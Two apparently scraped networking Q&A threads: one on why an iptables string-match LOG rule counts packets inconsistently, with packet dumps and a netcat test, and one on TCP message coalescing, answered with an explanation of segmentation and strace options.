0x0140: 6f6e 3a20 6b65 6570 2d61 6c69 7665 0d0a on:.keep-alive..
0x0150: 5265 6665 7265 723a 2068 7474 703a 2f2f Referer:.http://
0x0160: 7777 772e 6765 6e74 6f6f 2e6f 7267 2f69 www.gentoo.org/i
0x0170: 6e64 6578 2e70 6870 0d0a 0d0a ndex.php....
Here we see "/index.php" again.
But the LOG rule gives the following info:
kernel: [ 641.386182] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=60
kernel: [ 641.435946] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=52
kernel: [ 641.436226] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=424
kernel: [ 641.512594] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=52
kernel: [ 641.512762] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=52
kernel: [ 641.512819] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=89.16.167.134 LEN=52
kernel: [ 641.567496] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=60
kernel: [ 641.767707] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
kernel: [ 641.768328] matched :IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=380 <--
kernel: [ 641.768352] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=380
kernel: [ 641.990287] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
kernel: [ 641.990455] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
kernel: [ 641.990507] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
kernel: [ 641.990559] OUT : IN= OUT=eth0 SRC=192.168.66.106 DST=140.211.166.176 LEN=52
So we have a match on only one packet, the one going to 140.211.166.176. But where is the first match?
Even stranger, on another machine running Ubuntu I get different counters, e.g. 6 string matches.
I've also run the same simple test on my home notebook with Ubuntu 12.04, and I get 2 clean matches.
Maybe there is some option to tune how data is passed to the module, or something similar?
UPDATE:
Here is a very simple experiment; if someone could explain this part, it would give a hint.
Now two PCs: the server is CentOS 6.3, listening on port 80 with netcat and answering with a string:
# echo "List-IdServer"|nc -l 80
List-Id
And the client (Debian) connects to the server, sends data with nc and reads the answer:
% echo "List-Id"|nc butorabackup 80
List-IdServer
After the data exchange I have, on the SERVER SIDE:
Chain INPUT (policy ACCEPT 33 packets, 2164 bytes)
pkts bytes target prot opt in out source destination
1 60 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 STRING match "List-Id" ALGO name bm TO 6500 LOG flags 0 level 4
5 276 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 LOG flags 0 level 4
Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 23 packets, 4434 bytes)
pkts bytes target prot opt in out source destination
0 0 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80 STRING match "List-Id" ALGO name bm TO 6500 LOG flags 0 level 4
5 282 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80 LOG flags 0 level 4
and on the CLIENT SIDE:
Chain INPUT (policy ACCEPT 28 packets, 2187 bytes)
pkts bytes target prot opt in out source destination
1 66 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80 STRING match "List-Id" ALGO name bm TO 6500 LOG flags 0 level 4
5 282 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80 LOG flags 0 level 4
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 23 packets, 1721 bytes)
pkts bytes target prot opt in out source destination
1 60 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 STRING match "List-Id" ALGO name bm TO 6500 LOG flags 0 level 4
5 276 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 LOG flags 0 level 4
So there is NO OUTPUT rule match on the server. The server matched on IN, and the client matched on both IN and OUT.
I don't understand how this works :(
Thanks in advance.

TCP messages getting coalesced

I have a Java application that is writing to the network. It is writing messages in the region of 764 bytes, +/- 5 bytes. A pcap shows that the stream is getting IP fragmented, and we can't explain this.
Linux 2.6.18-238.1.1.el5
A strace shows:
(strace -vvvv -f -tt -o strace.out -e trace=network -p $PID)
1: 2045 12:48:23.984173 sendto(45, "\0\0\0\0\0\0\2\374\0\0\0\0\0\3\n\0\0\0\0\3upd\365myData"..., 764, 0, NULL, 0) = 764
2: 15206 12:48:23.984706 sendto(131, "\0\0\0\0\0\0\2\374\0\0\0\0\0\3\n\0\0\0\0\3upd\365myData"..., 764, 0, NULL, 0 <unfinished ...>
3: 2046 12:48:23.984811 sendto(46, "\0\0\0\0\0\0\2\374\0\0\0\0\0\3\n\0\0\0\0\3upd\365myData"..., 764, 0, NULL, 0 <unfinished ...>
4: 15206 12:48:23.984893 <... sendto resumed> ) = 764
5: 2046 12:48:23.984948 <... sendto resumed> ) = 764
I am seeing packets larger than the MTU when I capture the traffic, which is causing fragmentation.
4809 5.848987 10.0.0.2 -> 10.0.0.5 TCP 40656 > taiclock [ACK] Seq=325501 Ack=1 Win=46 Len=1448 TSV=344627654 TSER=270108068 # First Fragment
4810 5.848991 10.0.0.5 -> 10.0.0.2 TCP taiclock > 40656 [ACK] Seq=1 Ack=326949 Win=12287 Len=0 TSV=270108081 TSER=344627643 # TCP ack
4811 5.849037 10.0.0.2 -> 10.0.0.5 TCP 40656 > taiclock [PSH, ACK] Seq=326949 Ack=1 Win=46 Len=82 TSV=344627654 TSER=270108081 # Second Frag
Questions:
1) It appears the server is trying to batch the two sendto() calls into one IP packet, which is larger than the MTU and is therefore getting fragmented. Why?
2) Looking at the strace output for PID 2046, is the figure after the equals sign on the <... sendto resumed> line a total for what was sent? I.e. were 764 bytes sent in total for lines 3 and 5, or are 764 bytes sent per line?
3) Are there any options I can pass to strace to log all of the sendto() output? I can't seem to find anything.
To answer your questions, in order:
1) It is perfectly normal for multiple send calls to be coalesced when using TCP: it is a stream protocol and so does not preserve user-level send boundaries in any way. I don't see any evidence of IP fragmentation (which would be bad) in your trace, just TCP segmentation (which is completely normal).
2) Yes, that is the size - more specifically it is reporting the value that the system call returned after it resumed.
3) You can use "-e write=all", or "-e write=" followed by a set of file descriptors, to get strace to dump the whole of the written data.
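For example, the capture command from the question could be rerun with the write dump enabled (using the -e write=all form suggested in the answer; all other flags unchanged):
strace -vvvv -f -tt -o strace.out -e trace=network -e write=all -p $PID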
